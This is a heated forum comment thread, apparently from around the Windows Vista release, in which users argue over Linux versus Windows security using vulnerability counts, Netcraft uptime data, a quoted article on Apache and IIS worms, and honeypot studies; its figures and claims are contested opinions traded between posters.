TO ADDRESS THAT CLAIM, I RAN THE SEARCH ONLY LOOKING FOR HIGHLY CRITICAL AND EXTREMELY CRITICAL VULNERABILITIES. EVEN WHEN HIGHLY AND EXTREMELY CRITICAL (READ, MORE SEVERE) LINUX FARES 10 TIMES WORSE THAN LINUX! DEAL WITH IT! AND STOP ACCUSING ME OF IGNORING THAT PART WHEN I HAVE ADDRESSED IT THREE TIMES ALREADY! YOU KEEP BRINGING IT BACK UP DESPITE THE FACT THAT I HAVE ADDRESSED IT THREE TIMES!
Linux fares 10 times worse than Windows that is of course. Even with ONLY extremely critical and highly critical vulnerabilities (read as more severe vulnerabilities). Now stop ignoring the fact that I have already addressed that 3 fscking times, and you keep bringing it back up!
those figures from secuna don’t show anything at all. to reiterate, they only show the presence of malware, not whether they have had ANY EFFECT WHATSOEVER on the respective OS’s. and that, my dear friend, is the bottom line.
now to further add to your misery, here are some more pieces of evidence for you to glower over concerning how, while there are far more systems running apache on linux and other *nix systems than there are running windows server, the number of SUCCESSFUL ATTACKS and vulnerabilities is significantly more on windows servers (much of the evidence has been gathered from netcraft):
“Perhaps the most oft-repeated myth regarding Windows vs. Linux security is the claim that Windows has more incidents of viruses, worms, Trojans and other problems because malicious hackers tend to confine their activities to breaking into the software with the largest installed base. This reasoning is applied to defend Windows and Windows applications. Windows dominates the desktop; therefore Windows and Windows applications are the focus of the most attacks, which is why you don’t see viruses, worms and Trojans for Linux. While this may be true, at least in part, the intentional implication is not necessarily true: That Linux and Linux applications are no more secure than Windows and Windows applications, but Linux is simply too trifling a target to bother attacking.
This reasoning backfires when one considers that Apache is by far the most popular web server software on the Internet. According to the September 2004 Netcraft web site survey, [1] 68% of web sites run the Apache web server. Only 21% of web sites run Microsoft IIS. If security problems boil down to the simple fact that malicious hackers target the largest installed base, it follows that we should see more worms, viruses, and other malware targeting Apache and the underlying operating systems for Apache than for Windows and IIS. Furthermore, we should see more successful attacks against Apache than against IIS, since the implication of the myth is that the problem is one of numbers, not vulnerabilities.
Yet this is precisely the opposite of what we find, historically. IIS has long been the primary target for worms and other attacks, and these attacks have been largely successful. The Code Red worm that exploited a buffer overrun in an IIS service to gain control of the web servers infected some 300,000 servers, and the number of infections only stopped because the worm was deliberately written to stop spreading. Code Red.A had an even faster rate of infection, although it too self-terminated after three weeks. Another worm, IISWorm, had a limited impact only because the worm was badly written, not because IIS successfully protected itself.
Yes, worms for Apache have been known to exist, such as the Slapper worm. (Slapper actually exploited a known vulnerability in OpenSSL, not Apache). But Apache worms rarely make headlines because they have such a limited range of effect, and are easily eradicated. Target sites were already plugging the known OpenSSL hole. It was also trivially easy to clean and restore infected site with a few commands, and without as much as a reboot, thanks to the modular nature of Linux and UNIX.
Perhaps this is why, according to Netcraft, 47 of the top 50 web sites with the longest running uptime (times between reboots) run Apache. [2] None of the top 50 web sites runs Windows or Microsoft IIS. So if it is true that malicious hackers attack the most numerous software platforms, that raises the question as to why hackers are so successful at breaking into the most popular desktop software and operating system, infect 300,000 IIS servers, but are unable to do similar damage to the most popular web server and its operating systems?
Astute observers who examine the Netcraft web site URL will note that all 50 servers in the Netcraft uptime list are running a form of BSD, mostly BSD/OS. None of them are running Windows, and none of them are running Linux. The longest uptime in the top 50 is 1,768 consecutive days, or almost 5 years.
This appears to make BSD look superior to all operating systems in terms of reliability, but the Netcraft information is unintentionally misleading. Netcraft monitors the uptime of operating systems based on how those operating systems keep track of uptime. Linux, Solaris, HP-UX, and some versions of FreeBSD only record up to 497 days of uptime, after which their uptime counters are reset to zero and start again. So all web sites based on machines running Linux, Solaris, HP-UX and in some cases FreeBSD “appear” to reboot every 497 days even if they run for years. The Netcraft survey can never record a longer uptime than 497 days for any of these operating systems, even if they have been running for years without a reboot, which is why they never appear in the top 50.
That may explain why it is impossible for Linux, Solaris and HP-UX to show up with as impressive numbers of consecutive days of uptime as BSD — even if these operating systems actually run for years without a reboot. But it does not explain why Windows is nowhere to be found in the top 50 list. Windows does not reset its uptime counter. Obviously, no Windows-based web site has been able to run long enough without rebooting to rank among the top 50 for uptime.
Given the 497-rollover quirk, it is difficult to compare Linux uptimes vs. Windows uptimes from publicly available Netcraft data. Two data points are statistically insignificant, but they are somewhat telling, given that one of them concerns the Microsoft website. As of September 2004, the average uptime of the Windows web servers that run Microsoft’s own web site (www.microsoft.com) is roughly 59 days. The maximum uptime for Windows Server 2003 at the same site is 111 days, and the minimum is 5 days. Compare this to http://www.linux.com (a sample site that runs on Linux), which has had both an average and maximum uptime of 348 days. Since the average uptime is exactly equal to the maximum uptime, either these servers reached 497 days of uptime and reset to zero 348 days ago, or these servers were first put on-line or rebooted 348 days ago.
The bottom line is that quality, not quantity, is the determining factor when evaluating the number of successful attacks against software.”
http://www.theregister.co.uk/security/security_report_windows_vs_li…
> those figures from secuna don’t show anything at
> all. to reiterate, they only show the presence
> of malware
Wrong. Viruses / worms are recorded seperately from vulnerabilities. When it comes to highly critical / extremely critical vulnerabilities, Linux fares 10 times worse than its nearest competitor (Windows).
“Yet this is precisely the opposite of what we find, historically. IIS has long been the primary target for worms and other attacks, and these attacks have been largely successful”
You are pulling that out of your ass. The data shows otherwise. Apache has more than 50 highly critical and extremely critical vulnerabilities reported, compared to IIS’s 15. In addition, Apache averages two vulnerabilities reported every month. IIS has not had a vulnerability reported in over a year. Apache’s last vulnerability was reported in October of this year.
All you are using to base you claims on is the fact that IIS vulnerabilities get more press because of the fact that CNN, etc. follows what’s happening with Microsoft a lot more than they follow what is happening with Linux. You are also basing it on the fact that the OSS biased news sites like newsforge, slashdot, etc., all jump on the latest IIS vulnerabilities and make then big news, while quietly sweeping the vulnerabilities of Apache under the rug. Basically, Apache has vulnerabilities reported so often, that it is not even considered news. IIS averages one every six months, so when it happens, it is news.
“Perhaps this is why, according to Netcraft, 47 of the top 50 web sites with the longest running uptime (times between reboots) run Apache. [2] None of the top 50 web sites runs Windows or Microsoft IIS”
Hah! you fell into the uptime trap! Again proof you don’t have a clue about what you are talking about!
Clue factory: Windows uptime rolls over to 0 after approximately 49 days (according to MSDN). Linux kernel 2.4 uptime rolls over to 0 after approximately 200 days, and kernel 2.6 rolls over to 0 approximately every 50 days.
Which means that your uptime figures are 100% fscking worthless! There is absolutely no way to reliably track uptime!
Sorry. You lose. Thanks for playing. Try again when you have a clue about how the various operating systems reset their uptime.
> The bottom line is that quality, not quantity,
> is the determining factor when evaluating the
> number of successful attacks against software.”
Again, My data shows otherwise. And TheRegister is widely regarded to be an unreliable source. You are going to have to find something else.
“Again, My data shows otherwise.”
your data doesn’t show the number of successful attacks, whereas mine do. yours merely show the presence of the number of malware. please learn to interpret correctly.
next?
“your data doesn’t show the number of successful attacks, whereas mine do. yours merely show the presence of the number of malware. please learn to interpret correctly.”
Your data is junk data. Because most of the people didn’t even know the Linux system was there. It was behind a steal firewall. The Windows system was behind no firewall. That is a 100% garbage comparision.
And please learn the difference between malware, and vulnerabilites. How many times do I have to tell you that that what I was comparing was NOT NOT NOT malware?!?!
stealth firewall even
“Your data is junk data. ”
wishful thinking on your behalf. you still haven’t understood it. come back when you have. bye bye.
> wishful thinking on your behalf. you still
> haven’t understood it. come back when you have.
> bye bye.
But I have understood it. According to the article itself, the Linux system was behind a stealth firewall. In otherwords, it was virtually invisible, except for one open port. The Windows system was behind no firewall at all.
Only someone who is totally desperate to save their sinking ship could possibly try to make the argument that this is a fair comparision. The Linux system was practically invisible behind a stealth firewall. The Windows system was out in the open. That’s not even a remotely fair test. And it is a junk experiment. A good experiment requires isolating the variables to be tested. This was clearly not done in this case. One was behind a stealth firewall. The other was out in the open.
boy oh boy, IP: 81.76.38, you’re going to love this. just to rub it in yet further, the honeypot project was mentioned and linked to many posts ago and is worth bringing up again.
“The average unpatched Linux system survives for months on the Internet before being hacked, a report recently issued by the Honeypot Project claims.
The life expectancy of Linux has lengthened dramatically since 2001 and 2002, the project said, from a mere 72 hours two and three years ago to an average of three months today.
Honeypot Project is a non-profit that, as its name suggests, connects vulnerable systems to the Internet in the hope of drawing attacks so that they can be studied. To figure out the lifespan of a Linux system, the group set up a dozen “honeynets” — the project’s term for a system that hosts numerous virtual honeypot machines — in eight countries, then tracked the time it took for those machines to be compromised.
“What’s surprising is that even though threats and activity are reported as increasing, we see the life expectancy of Linux increasing against random attacks,” said the group’s report.
In comparison, unpatched Windows systems often are hacked within minutes of connecting to the Internet. Late last month, similar “honeypot” research done by AvanteGarde tallied the average survival time of several versions of Windows at just four minutes.”
Unfair comparision. The Linux system was behind a stealth firewall. The Windows system was not. In other words, most people didn’t even try to attach the Linux system because they didn’t know it was there.
Sorry. You can’t slip obviously flawed studies past my scientific eye when the Windows system was at a major disadvantage because it had no firewall, while the Linux system did.
Expect dimm sizes to suddenly increase.
2GB will probably become new base size with power users choosing 4GB, 8GB or more.
Vista will run much better in 2GB of ram than it does in 1GB, this will be partly due to enhanced cache systems and partly due to the fact that this is a SERVER OS that has wobbled its way onto the desktop as probably the most bloated and leaky operating system ever created for the PC.
Winblows VISTA = Viruses, Infections, Spyware, Trojans, Adware